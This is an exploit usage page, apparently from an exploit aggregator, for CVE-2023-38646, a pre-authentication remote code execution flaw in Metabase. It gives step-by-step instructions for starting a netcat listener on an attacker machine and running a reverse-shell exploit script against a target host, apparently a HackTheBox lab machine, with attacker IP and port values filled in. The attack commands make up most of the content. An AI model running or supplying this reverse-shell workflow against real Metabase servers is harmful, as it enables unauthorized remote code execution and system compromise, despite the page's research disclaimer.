Share
## https://sploitus.com/exploit?id=47E7805F-D106-50A0-87B6-1AE6A594102E
<h1 style="font-size:10vw" align="left">CVE-2023-38646 - Metabase Pre-Auth RCE</h1>

<img src="https://img.shields.io/badge/CVSS:3.1%20Score%20-9.8 CRITICAL-red"> <img src="https://img.shields.io/badge/Vulnerability%20Types-%20Remote%20Code%20Execution-blue">
*****
โš ๏ธ *For educational and authorized security research purposes only*

## Original Exploit Authors
Very grateful to the original PoC author [securezeron](https://github.com/securezeron)

## Step Guides
1. Set Up the Listener on your attacker machine:
   
    ```bash
    nc -nlvp 4444
    ```
    
2. Then, run this command:
   
    ```bash
    python3 CVE-2023-38646-Reverse-Shell.py -h
    python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444
    ```
    ![image](https://github.com/asepsaepdin/CVE-2023-38646/assets/122620685/6ef79e16-ac2f-4488-8ed4-6f8c4037eac6)

## Credits
- https://nvd.nist.gov/vuln/detail/CVE-2023-38646
- https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
- https://www.youtube.com/watch?v=br7JZzcTDG0